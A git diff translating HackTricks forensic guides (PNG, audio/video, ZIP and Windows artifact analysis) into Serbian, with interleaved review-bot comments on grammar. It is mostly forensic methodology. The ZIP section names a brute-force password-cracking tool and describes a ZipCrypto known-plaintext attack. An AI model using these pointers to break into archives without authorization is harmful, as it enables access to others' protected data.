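Review bot: grammatical agreement in `pdf-file-analysis.md`: "Da bi se razumeo PDF struktura" should be "Da bi se razumela PDF struktura" (struktura is feminine), and "NSA vodiča o rizicima i protivmera" should be "o rizicima i protivmerama" (same case as "rizicima").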
@@ -1,9 +1,9 @@ {{#include ../../../banners/hacktricks-training.md}} -**PNG files** are highly regarded in **CTF challenges** for their **lossless compression**, making them ideal for embedding hidden data. Tools like **Wireshark** enable the analysis of PNG files by dissecting their data within network packets, revealing embedded information or anomalies. +**PNG fajlovi** su veoma cenjeni u **CTF izazovima** zbog svoje **bezgubitne kompresije**, što ih čini idealnim za ugrađivanje skrivenih podataka. Alati poput **Wireshark** omogućavaju analizu PNG fajlova razlažući njihove podatke unutar mrežnih paketa, otkrivajući ugrađene informacije ili anomalije. -For checking PNG file integrity and repairing corruption, **pngcheck** is a crucial tool, offering command-line functionality to validate and diagnose PNG files ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). When files are beyond simple fixes, online services like [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) provide a web-based solution for **repairing corrupted PNGs**, aiding in the recovery of crucial data for CTF participants. +Za proveru integriteta PNG fajlova i popravku oštećenja, **pngcheck** je ključni alat, koji nudi funkcionalnost putem komandne linije za validaciju i dijagnostiku PNG fajlova ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). Kada su fajlovi izvan jednostavnih popravki, online usluge poput [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) pružaju web-rešenje za **popravku oštećenih PNG-ova**, pomažući u oporavku ključnih podataka za učesnike CTF-a. -These strategies underscore the importance of a comprehensive approach in CTFs, utilizing a blend of analytical tools and repair techniques to uncover and recover hidden or lost data. 
+Ove strategije naglašavaju važnost sveobuhvatnog pristupa u CTF-ima, koristeći kombinaciju analitičkih alata i tehnika popravke za otkrivanje i oporavak skrivenih ili izgubljenih podataka. {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md index 3d2103987..740622732 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md 
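Review bot: terminology in `png-tricks.md`: "bezgubitne kompresije" is a calque; the established term for lossless compression is "kompresije bez gubitaka". Also "web-rešenje" does not need the hyphen ("web rešenje").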
@@ -1,14 +1,14 @@ {{#include ../../../banners/hacktricks-training.md}} -**Audio and video file manipulation** is a staple in **CTF forensics challenges**, leveraging **steganography** and metadata analysis to hide or reveal secret messages. Tools such as **[mediainfo](https://mediaarea.net/en/MediaInfo)** and **`exiftool`** are essential for inspecting file metadata and identifying content types. +**Manipulacija audio i video fajlovima** je osnovna komponenta u **CTF forenzičkim izazovima**, koristeći **steganografiju** i analizu metapodataka za skrivanje ili otkrivanje tajnih poruka. Alati kao što su **[mediainfo](https://mediaarea.net/en/MediaInfo)** i **`exiftool`** su neophodni za inspekciju metapodataka fajlova i identifikaciju tipova sadržaja. -For audio challenges, **[Audacity](http://www.audacityteam.org/)** stands out as a premier tool for viewing waveforms and analyzing spectrograms, essential for uncovering text encoded in audio. **[Sonic Visualiser](http://www.sonicvisualiser.org/)** is highly recommended for detailed spectrogram analysis. **Audacity** allows for audio manipulation like slowing down or reversing tracks to detect hidden messages. **[Sox](http://sox.sourceforge.net/)**, a command-line utility, excels in converting and editing audio files. +Za audio izazove, **[Audacity](http://www.audacityteam.org/)** se ističe kao vrhunski alat za pregled talasnih oblika i analizu spektrograma, što je ključno za otkrivanje teksta kodiranog u audio. **[Sonic Visualiser](http://www.sonicvisualiser.org/)** se toplo preporučuje za detaljnu analizu spektrograma. **Audacity** omogućava manipulaciju audio sadržajem kao što su usporavanje ili preokretanje pesama kako bi se otkrile skrivene poruke. **[Sox](http://sox.sourceforge.net/)**, alat za komandnu liniju, odlično se snalazi u konvertovanju i uređivanju audio fajlova. 
-**Least Significant Bits (LSB)** manipulation is a common technique in audio and video steganography, exploiting the fixed-size chunks of media files to embed data discreetly. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** is useful for decoding messages hidden as **DTMF tones** or **Morse code**. +**Manipulacija najmanje značajnim bitovima (LSB)** je uobičajena tehnika u audio i video steganografiji, koristeći fiksne veličine delova medijskih fajlova za diskretno umetanje podataka. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** je koristan za dekodiranje poruka skrivenih kao **DTMF tonovi** ili **Morseova azbuka**. -Video challenges often involve container formats that bundle audio and video streams. **[FFmpeg](http://ffmpeg.org/)** is the go-to for analyzing and manipulating these formats, capable of de-multiplexing and playing back content. For developers, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** integrates FFmpeg's capabilities into Python for advanced scriptable interactions. +Video izazovi često uključuju kontejnerske formate koji kombinuju audio i video tokove. **[FFmpeg](http://ffmpeg.org/)** je alat koji se koristi za analizu i manipulaciju ovim formatima, sposoban za de-multiplexing i reprodukciju sadržaja. Za programere, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** integriše FFmpeg-ove mogućnosti u Python za napredne skriptabilne interakcije. -This array of tools underscores the versatility required in CTF challenges, where participants must employ a broad spectrum of analysis and manipulation techniques to uncover hidden data within audio and video files. +Ova paleta alata naglašava svestranost potrebnu u CTF izazovima, gde učesnici moraju koristiti širok spektar tehnika analize i manipulacije kako bi otkrili skrivene podatke unutar audio i video fajlova. ## References 
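Review bot: in `video-and-audio-file-analysis.md` "preokretanje pesama" renders "reversing tracks" as "reversing songs"; a CTF track need not be music, so "preokretanje zapisa" or "audio traka" is the neutral choice. Likewise "teksta kodiranog u audio" should be "kodiranog u audio zapisu".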
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md index d4e17eb0d..1ef2e4e64 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md 
@@ -1,20 +1,20 @@ -# ZIPs tricks +# ZIPs trikovi {{#include ../../../banners/hacktricks-training.md}} -**Command-line tools** for managing **zip files** are essential for diagnosing, repairing, and cracking zip files. Here are some key utilities: +**Alatke za komandnu liniju** za upravljanje **zip datotekama** su neophodne za dijagnostikovanje, popravku i probijanje zip datoteka. Evo nekoliko ključnih alata: -- **`unzip`**: Reveals why a zip file may not decompress. -- **`zipdetails -v`**: Offers detailed analysis of zip file format fields. -- **`zipinfo`**: Lists contents of a zip file without extracting them. -- **`zip -F input.zip --out output.zip`** and **`zip -FF input.zip --out output.zip`**: Try to repair corrupted zip files. -- **[fcrackzip](https://github.com/hyc/fcrackzip)**: A tool for brute-force cracking of zip passwords, effective for passwords up to around 7 characters. +- **`unzip`**: Otkriva zašto zip datoteka možda ne može da se raspakuje. +- **`zipdetails -v`**: Pruža detaljnu analizu polja formata zip datoteke. +- **`zipinfo`**: Navodi sadržaj zip datoteke bez vađenja. +- **`zip -F input.zip --out output.zip`** i **`zip -FF input.zip --out output.zip`**: Pokušavaju da poprave oštećene zip datoteke. +- **[fcrackzip](https://github.com/hyc/fcrackzip)**: Alat za brute-force probijanje zip lozinki, efikasan za lozinke do oko 7 karaktera. -The [Zip file format specification](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) provides comprehensive details on the structure and standards of zip files. +[Specifikacija formata zip datoteka](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) pruža sveobuhvatne detalje o strukturi i standardima zip datoteka. -It's crucial to note that password-protected zip files **do not encrypt filenames or file sizes** within, a security flaw not shared with RAR or 7z files which encrypt this information. 
Furthermore, zip files encrypted with the older ZipCrypto method are vulnerable to a **plaintext attack** if an unencrypted copy of a compressed file is available. This attack leverages the known content to crack the zip's password, a vulnerability detailed in [HackThis's article](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) and further explained in [this academic paper](https://www.cs.auckland.ac.nz/~mike/zipattacks.pdf). However, zip files secured with **AES-256** encryption are immune to this plaintext attack, showcasing the importance of choosing secure encryption methods for sensitive data. +Važno je napomenuti da zip datoteke zaštićene lozinkom **ne enkriptuju imena datoteka ili veličine datoteka** unutar, što je sigurnosni propust koji RAR ili 7z datoteke ne dele, jer enkriptuju te informacije. Pored toga, zip datoteke enkriptovane starijom metodom ZipCrypto su podložne **napadu u običnom tekstu** ako je dostupna neenkriptovana kopija kompresovane datoteke. Ovaj napad koristi poznati sadržaj za probijanje zip lozinke, ranjivost detaljno objašnjenu u [HackThis članku](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) i dodatno objašnjenu u [ovoj akademskoj studiji](https://www.cs.auckland.ac.nz/~mike/zipattacks.pdf). Međutim, zip datoteke zaštićene **AES-256** enkripcijom su imune na ovaj napad u običnom tekstu, što pokazuje važnost izbora sigurnih metoda enkripcije za osetljive podatke. -## References +## Reference - [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/) diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md index bf7543e9b..26ba08e9b 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md 
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md 
@@ -1,270 +1,266 @@ -# Windows Artifacts +# Windows artefakti -## Windows Artifacts +## Windows artefakti {{#include ../../../banners/hacktricks-training.md}} -## Generic Windows Artifacts +## Opšti Windows artefakti -### Windows 10 Notifications +### Windows 10 obaveštenja -In the path `\Users\\AppData\Local\Microsoft\Windows\Notifications` you can find the database `appdb.dat` (before Windows anniversary) or `wpndatabase.db` (after Windows Anniversary). +U putanji `\Users\\AppData\Local\Microsoft\Windows\Notifications` možete pronaći bazu podataka `appdb.dat` (pre Windows godišnjice) ili `wpndatabase.db` (posle Windows godišnjice). -Inside this SQLite database, you can find the `Notification` table with all the notifications (in XML format) that may contain interesting data. +Unutar ove SQLite baze podataka, možete pronaći tabelu `Notification` sa svim obaveštenjima (u XML formatu) koja mogu sadržati zanimljive podatke. -### Timeline +### Hronologija -Timeline is a Windows characteristic that provides **chronological history** of web pages visited, edited documents, and executed applications. +Hronologija je karakteristika Windows-a koja pruža **hronološku istoriju** web stranica koje su posećene, uređivanih dokumenata i izvršenih aplikacija. -The database resides in the path `\Users\\AppData\Local\ConnectedDevicesPlatform\\ActivitiesCache.db`. This database can be opened with an SQLite tool or with the tool [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **which generates 2 files that can be opened with the tool** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md). +Baza podataka se nalazi u putanji `\Users\\AppData\Local\ConnectedDevicesPlatform\\ActivitiesCache.db`. Ova baza podataka može se otvoriti sa SQLite alatom ili sa alatom [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **koji generiše 2 datoteke koje se mogu otvoriti sa alatom** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md). 
-### ADS (Alternate Data Streams) +### ADS (Alternativni tokovi podataka) -Files downloaded may contain the **ADS Zone.Identifier** indicating **how** it was **downloaded** from the intranet, internet, etc. Some software (like browsers) usually put even **more** **information** like the **URL** from where the file was downloaded. +Preuzete datoteke mogu sadržati **ADS Zone.Identifier** koji ukazuje **kako** je **preuzeta** sa intraneta, interneta itd. Neki softver (poput pregledača) obično dodaje čak i **više** **informacija** poput **URL-a** sa kojeg je datoteka preuzeta. -## **File Backups** +## **Backup datoteka** -### Recycle Bin +### Korpa za otpatke -In Vista/Win7/Win8/Win10 the **Recycle Bin** can be found in the folder **`$Recycle.bin`** in the root of the drive (`C:\$Recycle.bin`).\ -When a file is deleted in this folder 2 specific files are created: +U Vista/Win7/Win8/Win10 **Korpa za otpatke** može se pronaći u fascikli **`$Recycle.bin`** u korenu diska (`C:\$Recycle.bin`).\ +Kada se datoteka obriše u ovoj fascikli, kreiraju se 2 specifične datoteke: -- `$I{id}`: File information (date of when it was deleted} -- `$R{id}`: Content of the file +- `$I{id}`: Informacije o datoteci (datum kada je obrisana) +- `$R{id}`: Sadržaj datoteke ![](<../../../images/image (1029).png>) -Having these files you can use the tool [**Rifiuti**](https://github.com/abelcheung/rifiuti2) to get the original address of the deleted files and the date it was deleted (use `rifiuti-vista.exe` for Vista – Win10). - +Imajući ove datoteke, možete koristiti alat [**Rifiuti**](https://github.com/abelcheung/rifiuti2) da dobijete originalnu adresu obrisanih datoteka i datum kada je obrisana (koristite `rifiuti-vista.exe` za Vista – Win10). 
``` .\rifiuti-vista.exe C:\Users\student\Desktop\Recycle ``` - ![](<../../../images/image (495) (1) (1) (1).png>) ### Volume Shadow Copies -Shadow Copy is a technology included in Microsoft Windows that can create **backup copies** or snapshots of computer files or volumes, even when they are in use. +Shadow Copy je tehnologija uključena u Microsoft Windows koja može da kreira **rezervne kopije** ili snimke računarskih datoteka ili volumena, čak i kada su u upotrebi. -These backups are usually located in the `\System Volume Information` from the root of the file system and the name is composed of **UIDs** shown in the following image: +Ove rezervne kopije se obično nalaze u `\System Volume Information` iz korena fajl sistema, a ime se sastoji od **UID-ova** prikazanih na sledećoj slici: ![](<../../../images/image (94).png>) -Mounting the forensics image with the **ArsenalImageMounter**, the tool [**ShadowCopyView**](https://www.nirsoft.net/utils/shadow_copy_view.html) can be used to inspect a shadow copy and even **extract the files** from the shadow copy backups. +Montiranjem forenzičke slike sa **ArsenalImageMounter**, alat [**ShadowCopyView**](https://www.nirsoft.net/utils/shadow_copy_view.html) može se koristiti za inspekciju shadow copy-a i čak **ekstrakciju datoteka** iz rezervnih kopija shadow copy-a. ![](<../../../images/image (576).png>) -The registry entry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` contains the files and keys **to not backup**: +Registri unos `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` sadrži datoteke i ključeve **koje ne treba rezervisati**: ![](<../../../images/image (254).png>) -The registry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` also contains configuration information about the `Volume Shadow Copies`. +Registri `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` takođe sadrži informacije o konfiguraciji `Volume Shadow Copies`. 
### Office AutoSaved Files -You can find the office autosaved files in: `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\` +Možete pronaći automatski sačuvane datoteke u: `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\` ## Shell Items -A shell item is an item that contains information about how to access another file. +Shell item je stavka koja sadrži informacije o tome kako pristupiti drugoj datoteci. ### Recent Documents (LNK) -Windows **automatically** **creates** these **shortcuts** when the user **open, uses or creates a file** in: +Windows **automatski** **kreira** ove **prečice** kada korisnik **otvori, koristi ili kreira datoteku** u: - Win7-Win10: `C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\` - Office: `C:\Users\\AppData\Roaming\Microsoft\Office\Recent\` -When a folder is created, a link to the folder, to the parent folder, and the grandparent folder is also created. +Kada se kreira folder, takođe se kreira veza do foldera, do roditeljskog foldera i do foldera bake. -These automatically created link files **contain information about the origin** like if it's a **file** **or** a **folder**, **MAC** **times** of that file, **volume information** of where is the file stored and **folder of the target file**. This information can be useful to recover those files in case they were removed. +Ove automatski kreirane link datoteke **sadrže informacije o poreklu** kao što su da li je to **datoteka** **ili** **folder**, **MAC** **vremena** te datoteke, **informacije o volumenu** gde je datoteka smeštena i **folder ciljne datoteke**. Ove informacije mogu biti korisne za oporavak tih datoteka u slučaju da su uklonjene. -Also, the **date created of the link** file is the first **time** the original file was **first** **used** and the **date** **modified** of the link file is the **last** **time** the origin file was used. 
+Takođe, **datum kreiranja link** datoteke je prvi **put** kada je originalna datoteka **prvi put** **korisćena**, a **datum** **modifikacije** link datoteke je **poslednji** **put** kada je izvorna datoteka korišćena. -To inspect these files you can use [**LinkParser**](http://4discovery.com/our-tools/). +Da biste inspektovali ove datoteke, možete koristiti [**LinkParser**](http://4discovery.com/our-tools/). -In this tools you will find **2 sets** of timestamps: +U ovom alatu ćete pronaći **2 skupa** vremenskih oznaka: -- **First Set:** - 1. FileModifiedDate - 2. FileAccessDate - 3. FileCreationDate -- **Second Set:** - 1. LinkModifiedDate - 2. LinkAccessDate - 3. LinkCreationDate. +- **Prvi skup:** +1. FileModifiedDate +2. FileAccessDate +3. FileCreationDate +- **Drugi skup:** +1. LinkModifiedDate +2. LinkAccessDate +3. LinkCreationDate. -The first set of timestamp references the **timestamps of the file itself**. The second set references the **timestamps of the linked file**. - -You can get the same information running the Windows CLI tool: [**LECmd.exe**](https://github.com/EricZimmerman/LECmd) +Prvi skup vremenskih oznaka se odnosi na **vremenske oznake same datoteke**. Drugi skup se odnosi na **vremenske oznake povezane datoteke**. +Možete dobiti iste informacije pokretanjem Windows CLI alata: [**LECmd.exe**](https://github.com/EricZimmerman/LECmd) ``` LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs ``` - -In this case, the information is going to be saved inside a CSV file. +U ovom slučaju, informacije će biti sačuvane unutar CSV datoteke. ### Jumplists -These are the recent files that are indicated per application. It's the list of **recent files used by an application** that you can access on each application. They can be created **automatically or be custom**. +Ovo su nedavne datoteke koje su označene po aplikaciji. 
To je lista **nedavnih datoteka korišćenih od strane aplikacije** kojima možete pristupiti u svakoj aplikaciji. Mogu biti kreirane **automatski ili po meri**. -The **jumplists** created automatically are stored in `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`. The jumplists are named following the format `{id}.autmaticDestinations-ms` where the initial ID is the ID of the application. +**Jumplists** kreirane automatski se čuvaju u `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`. Jumplists su imenovane prema formatu `{id}.autmaticDestinations-ms` gde je početni ID ID aplikacije. -The custom jumplists are stored in `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` and they are created by the application usually because something **important** has happened with the file (maybe marked as favorite) +Prilagođeni jumplists se čuvaju u `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` i obično ih kreira aplikacija jer se nešto **važnog** dogodilo sa datotekom (možda označeno kao omiljeno). -The **created time** of any jumplist indicates the **the first time the file was accessed** and the **modified time the last time**. +**Vreme kreiranja** bilo kog jumplista označava **prvi put kada je datoteka pristupljena** i **vreme modifikacije poslednji put**. -You can inspect the jumplists using [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md). +Možete pregledati jumplists koristeći [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md). 
![](<../../../images/image (168).png>) -(_Note that the timestamps provided by JumplistExplorer are related to the jumplist file itself_) +(_Napomena da su vremenski oznake koje pruža JumplistExplorer povezane sa samom jumplist datotekom_) ### Shellbags -[**Follow this link to learn what are the shellbags.**](interesting-windows-registry-keys.md#shellbags) +[**Pratite ovaj link da saznate šta su shellbags.**](interesting-windows-registry-keys.md#shellbags) -## Use of Windows USBs +## Korišćenje Windows USB-a -It's possible to identify that a USB device was used thanks to the creation of: +Moguće je identifikovati da je USB uređaj korišćen zahvaljujući kreiranju: - Windows Recent Folder - Microsoft Office Recent Folder - Jumplists -Note that some LNK file instead of pointing to the original path, points to the WPDNSE folder: +Napomena da neka LNK datoteka umesto da pokazuje na originalni put, pokazuje na WPDNSE folder: ![](<../../../images/image (218).png>) -The files in the folder WPDNSE are a copy of the original ones, then won't survive a restart of the PC and the GUID is taken from a shellbag. +Datoteke u WPDNSE folderu su kopije originalnih, stoga neće preživeti restart PC-a i GUID se uzima iz shellbaga. ### Registry Information -[Check this page to learn](interesting-windows-registry-keys.md#usb-information) which registry keys contain interesting information about USB connected devices. +[Proverite ovu stranicu da saznate](interesting-windows-registry-keys.md#usb-information) koji registry ključevi sadrže zanimljive informacije o USB povezanim uređajima. ### setupapi -Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`). +Proverite datoteku `C:\Windows\inf\setupapi.dev.log` da dobijete vremenske oznake kada je USB konekcija ostvarena (potražite `Section start`). 
-![](<../../../images/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (14) (2).png>) +![](<../../../images/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (14) (2).png>) ### USB Detective -[**USBDetective**](https://usbdetective.com) can be used to obtain information about the USB devices that have been connected to an image. +[**USBDetective**](https://usbdetective.com) može se koristiti za dobijanje informacija o USB uređajima koji su povezani sa slikom. ![](<../../../images/image (452).png>) ### Plug and Play Cleanup -The scheduled task known as 'Plug and Play Cleanup' is primarily designed for the removal of outdated driver versions. Contrary to its specified purpose of retaining the latest driver package version, online sources suggest it also targets drivers that have been inactive for 30 days. Consequently, drivers for removable devices not connected in the past 30 days may be subject to deletion. +Zakazana aktivnost poznata kao 'Plug and Play Cleanup' prvenstveno je dizajnirana za uklanjanje zastarelih verzija drajvera. Suprotno njenoj specificiranoj svrsi zadržavanja najnovije verzije paketa drajvera, online izvori sugerišu da takođe cilja drajvere koji su bili neaktivni 30 dana. Kao rezultat, drajveri za uklonjive uređaje koji nisu povezani u poslednjih 30 dana mogu biti podložni brisanju. -The task is located at the following path: `C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`. +Zadatak se nalazi na sledećem putu: `C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`. 
-A screenshot depicting the task's content is provided: ![](https://2.bp.blogspot.com/-wqYubtuR_W8/W19bV5S9XyI/AAAAAAAANhU/OHsBDEvjqmg9ayzdNwJ4y2DKZnhCdwSMgCLcBGAs/s1600/xml.png) +Prikazana je slika koja prikazuje sadržaj zadatka: ![](https://2.bp.blogspot.com/-wqYubtuR_W8/W19bV5S9XyI/AAAAAAAANhU/OHsBDEvjqmg9ayzdNwJ4y2DKZnhCdwSMgCLcBGAs/s1600/xml.png) -**Key Components and Settings of the Task:** +**Ključne komponente i podešavanja zadatka:** -- **pnpclean.dll**: This DLL is responsible for the actual cleanup process. -- **UseUnifiedSchedulingEngine**: Set to `TRUE`, indicating the use of the generic task scheduling engine. +- **pnpclean.dll**: Ova DLL je odgovorna za stvarni proces čišćenja. +- **UseUnifiedSchedulingEngine**: Podešeno na `TRUE`, što ukazuje na korišćenje generičkog mehanizma za zakazivanje zadataka. - **MaintenanceSettings**: - - **Period ('P1M')**: Directs the Task Scheduler to initiate the cleanup task monthly during regular Automatic maintenance. - - **Deadline ('P2M')**: Instructs the Task Scheduler, if the task fails for two consecutive months, to execute the task during emergency Automatic maintenance. +- **Period ('P1M')**: Usmerava Task Scheduler da pokrene zadatak čišćenja mesečno tokom redovnog automatskog održavanja. +- **Deadline ('P2M')**: Upravlja Task Scheduler-om, ako zadatak ne uspe dva uzastopna meseca, da izvrši zadatak tokom hitnog automatskog održavanja. -This configuration ensures regular maintenance and cleanup of drivers, with provisions for reattempting the task in case of consecutive failures. +Ova konfiguracija osigurava redovno održavanje i čišćenje drajvera, sa odredbama za ponovni pokušaj zadatka u slučaju uzastopnih neuspeha. 
-**For more information check:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html) +**Za više informacija proverite:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html) ## Emails -Emails contain **2 interesting parts: The headers and the content** of the email. In the **headers** you can find information like: +Emailovi sadrže **2 zanimljiva dela: zaglavlja i sadržaj** emaila. U **zaglavljima** možete pronaći informacije kao što su: -- **Who** sent the emails (email address, IP, mail servers that have redirected the email) -- **When** was the email sent +- **Ko** je poslao emailove (email adresa, IP, mail serveri koji su preusmerili email) +- **Kada** je email poslat -Also, inside the `References` and `In-Reply-To` headers you can find the ID of the messages: +Takođe, unutar `References` i `In-Reply-To` zaglavlja možete pronaći ID poruka: ![](<../../../images/image (593).png>) ### Windows Mail App -This application saves emails in HTML or text. You can find the emails inside subfolders inside `\Users\\AppData\Local\Comms\Unistore\data\3\`. The emails are saved with the `.dat` extension. +Ova aplikacija čuva emailove u HTML-u ili tekstu. Možete pronaći emailove unutar podfoldera unutar `\Users\\AppData\Local\Comms\Unistore\data\3\`. Emailovi se čuvaju sa `.dat` ekstenzijom. -The **metadata** of the emails and the **contacts** can be found inside the **EDB database**: `\Users\\AppData\Local\Comms\UnistoreDB\store.vol` +**Metapodaci** emailova i **kontakti** mogu se naći unutar **EDB baze podataka**: `\Users\\AppData\Local\Comms\UnistoreDB\store.vol` -**Change the extension** of the file from `.vol` to `.edb` and you can use the tool [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html) to open it. Inside the `Message` table you can see the emails. 
+**Promenite ekstenziju** datoteke sa `.vol` na `.edb` i možete koristiti alat [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html) da je otvorite. Unutar `Message` tabele možete videti emailove. ### Microsoft Outlook -When Exchange servers or Outlook clients are used there are going to be some MAPI headers: +Kada se koriste Exchange serveri ili Outlook klijenti, biće prisutni neki MAPI zaglavlja: -- `Mapi-Client-Submit-Time`: Time of the system when the email was sent -- `Mapi-Conversation-Index`: Number of children messages of the thread and timestamp of each message of the thread -- `Mapi-Entry-ID`: Message identifier. -- `Mappi-Message-Flags` and `Pr_last_Verb-Executed`: Information about the MAPI client (message read? no read? responded? redirected? out of the office?) +- `Mapi-Client-Submit-Time`: Vreme sistema kada je email poslat +- `Mapi-Conversation-Index`: Broj poruka u thread-u i vremenska oznaka svake poruke u thread-u +- `Mapi-Entry-ID`: Identifikator poruke. +- `Mappi-Message-Flags` i `Pr_last_Verb-Executed`: Informacije o MAPI klijentu (poruka pročitana? nije pročitana? odgovoreno? preusmereno? van kancelarije?) -In the Microsoft Outlook client, all the sent/received messages, contacts data, and calendar data are stored in a PST file in: +U Microsoft Outlook klijentu, sve poslate/primljene poruke, podaci o kontaktima i podaci o kalendaru čuvaju se u PST datoteci u: - `%USERPROFILE%\Local Settings\Application Data\Microsoft\Outlook` (WinXP) - `%USERPROFILE%\AppData\Local\Microsoft\Outlook` -The registry path `HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook` indicates the file that is being used. +Putanja u registru `HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook` ukazuje na datoteku koja se koristi. 
-You can open the PST file using the tool [**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html). +Možete otvoriti PST datoteku koristeći alat [**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html). ![](<../../../images/image (498).png>) ### Microsoft Outlook OST Files -An **OST file** is generated by Microsoft Outlook when it's configured with **IMAP** or an **Exchange** server, storing similar information to a PST file. This file is synchronized with the server, retaining data for **the last 12 months** up to a **maximum size of 50GB**, and is located in the same directory as the PST file. To view an OST file, the [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html) can be utilized. +**OST datoteka** se generiše od strane Microsoft Outlook-a kada je konfigurisan sa **IMAP** ili **Exchange** serverom, čuvajući slične informacije kao PST datoteka. Ova datoteka se sinhronizuje sa serverom, zadržavajući podatke za **poslednjih 12 meseci** do **maksimalne veličine od 50GB**, i nalazi se u istom direktorijumu kao PST datoteka. Da biste pregledali OST datoteku, može se koristiti [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html). ### Retrieving Attachments -Lost attachments might be recoverable from: +Izgubljeni dodaci mogu se povratiti iz: -- For **IE10**: `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook` -- For **IE11 and above**: `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook` +- Za **IE10**: `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook` +- Za **IE11 i novije**: `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook` ### Thunderbird MBOX Files -**Thunderbird** utilizes **MBOX files** to store data, located at `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles`. +**Thunderbird** koristi **MBOX datoteke** za čuvanje podataka, smeštene u `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles`. 
